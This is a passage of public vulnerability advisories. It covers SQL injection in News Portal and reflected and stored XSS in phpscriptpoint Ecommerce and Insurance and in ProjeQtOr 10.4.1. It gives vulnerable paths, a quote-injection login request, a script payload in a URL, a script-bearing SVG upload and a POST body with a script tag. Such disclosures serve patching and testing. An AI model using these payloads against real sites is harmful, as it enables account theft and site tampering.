/>Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/newsportal/admin/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8<br />Connection: close<br /><br />username=admin''&password=Test%40123&login=<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 11:02:15 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 4733<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><script>alert('Invalid Details');</script><br /><!DOCTYPE html><br /><html lang="en"><br /> <head><br /> <meta charset="utf-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <meta name="description" content="News Portal."><br /> <meta name="author" content="PHPGurukul"><br /><br /><br /> <!-- App title --><br /> <title>News Portal | Admin Panel</title><br />[...]<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Ecommerce 1.15 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/ecommerce/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /ecommerce/blog-single.php<br /><br />GET parameter 'slug' is vulnerable to RXSS<br /><br />https://website/ecommerce/blog-single.php?slug=[XSS]<br /><br /><br />Path: /ecommerce/product.php<br /><br />GET parameter 'id' is vulnerable to RXSS<br /><br />https://website/ecommerce/product.php?id=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Insurance 1.2 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/insurance/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /insurance/page.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/insurance/page.php/[XSS]?slug=blog&page=3<br /><br /><br />Path: /insurance/search.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/insurance/search.php/[XSS]?search_string=&page=3<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS<br />Version: V10.4.1<br />Bugs: Multiple XSS<br />Technology: PHP<br />Vendor URL: https://www.projeqtor.org<br />Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download<br />Date of found: 09.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br /><br /> ### XSS-1 ### <br /><br /><br />visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=<br />payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E<br /><br /> ### XSS-2 ###<br /><br />steps: <br /><br />1. login to account<br />2. go projects and create project<br />3.add attachment<br />3. upload svg file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />4. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )<br /><br /><br /> ### XSS-3 ###<br /><br />Go to below adress (post request)<br /><br />POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1<br />Host: localhost<br />Content-Length: 35<br />sec-ch-ua: <br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />sec-ch-ua-platform: ""<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/projeqtor/view/main.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3<br />Connection: close<br /><br />resultAck=<script>alert(4)</script><br /><br /></code></pre>